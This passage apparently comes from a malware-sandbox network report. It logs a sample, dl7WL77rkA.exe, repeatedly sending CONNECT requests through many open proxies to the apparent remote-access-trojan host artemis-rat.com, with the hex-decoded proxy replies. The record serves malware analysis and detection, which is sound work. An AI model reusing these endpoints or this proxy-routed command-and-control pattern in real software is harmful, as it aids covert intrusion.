                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            532192.168.2.55151347.114.101.5788883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.573451996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.879256010 CET334INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 204
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            533192.168.2.551584104.23.128.174803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.578043938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.743041992 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            534192.168.2.551620104.20.179.187803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.580228090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.763217926 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            535192.168.2.55151694.130.181.59327703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.584955931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.129926920 CET132INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            536192.168.2.5514295.202.191.22580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.602507114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.389202118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702090979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.045089960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902420998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717602015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405213118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            537192.168.2.551533217.23.11.194471523876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.603414059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.899086952 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            538192.168.2.551462103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.628974915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            539192.168.2.55047591.211.177.3736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.629168034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            540192.168.2.5515278.213.128.90210253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.633248091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.963520050 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            541192.168.2.551640205.196.184.69507043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.634326935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.123589993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.732971907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092703104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.318907976 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            542192.168.2.55155672.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.636847019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            543192.168.2.551509139.129.162.6531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.682570934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.058787107 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            544192.168.2.550543188.40.44.83803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.683693886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702141047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.702605963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.701958895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.701977015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            545192.168.2.551557184.185.2.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.683696985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            546192.168.2.55168534.102.179.21803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.683834076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.955913067 CET462INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                            Content-Length: 317
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 6d 65 74 68 6f 64 20 3c 63 6f 64 65 3e 43 4f 4e 4e 45 43 54 3c 2f 63 6f 64 65 3e 20 69 73 20 69 6e 61 70 70 72 6f 70 72 69 61 74 65 20 66 6f 72 20 74 68 65 20 55 52 4c 20 3c 63 6f 64 65 3e 2f 3c 2f 63 6f 64 65 3e 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>405 Method Not Allowed</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Method Not Allowed</h1><h2>The request method <code>CONNECT</code> is inappropriate for the URL <code>/</code>.</h2><h2></h2></body></html>


